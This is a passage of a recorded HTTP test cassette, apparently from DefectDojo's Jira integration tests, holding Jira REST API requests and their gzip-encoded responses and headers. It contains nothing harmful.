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 + AA== + headers: + ATL-TraceId: + - 7df9ec1e5ed29c58 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:48 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 44963ad8-3381-4805-8962-1cc7ec384507 + x-envoy-upstream-service-time: + - '158' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10608 + response: + body: + string: !!binary | + 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 + 1BsAAA== + headers: + ATL-TraceId: + - d10bcc882c6da1a4 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:48 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - d8847344-5c08-4a3c-8353-22ba3a0a372d + x-envoy-upstream-service-time: + - '131' + status: + code: 200 + message: OK +- request: + body: '{"issueKeys": ["10608"], "ignoreEpics": true}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '45' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: PUT + uri: https://defectdojo.atlassian.net/rest/greenhopper/1.0/epics/333/add + response: + body: + string: '{"errorMessages":["Issue does not exist or you do not have permission + to see it."],"errors":{}}' + headers: + ATL-TraceId: + - cf126688894dcaf1 + Connection: + - close + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:48 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - b47567b6-5938-4ff8-87b7-149dcc9bfeda + x-envoy-upstream-service-time: + - '32' + status: + code: 400 + message: Bad Request +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPwWrDMBBE/0XX2s5KkexYt9Ie2lLSgp1TCUW2V9RFlowlF0LIv1eigfS2M/tm + hz2TTnk8LIZI8hXC7OVmM6DGPgzu2xUqGOX9qGxhMZCM/ODiR2cjTAFoAQXkzf7+vXl6a2/b/Tp1 + cSLyI0EZZHDMyICzcacJbWhPM8YDD8atQwx162iGvwiRKSD41XxUIYEMGM2B5axsKZWsklteAMAd + RDjmPS6xtx2nG7vNgbYMJOdSQFHRG9tPz1a7CPJSiEpTrRH5rq614kmjohUrxY5FwURfl/W/gmBS + w8u4KJLe0Wo14dX1KtlnYq4TQft5aMjl8gsAAP//AwByMRG7WgEAAA== + headers: + ATL-TraceId: + - 0589382028116d28 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:50 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 1b56723b-71d0-4026-8c7e-5e5b3d462492 + x-envoy-upstream-service-time: + - '51' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 84499d46f8ba26c1 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:50 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 9bbb1f8c-cd6c-476e-8925-6f3098f7ae13 + x-envoy-upstream-service-time: + - '65' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10608 + response: + body: + string: !!binary | + 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 + 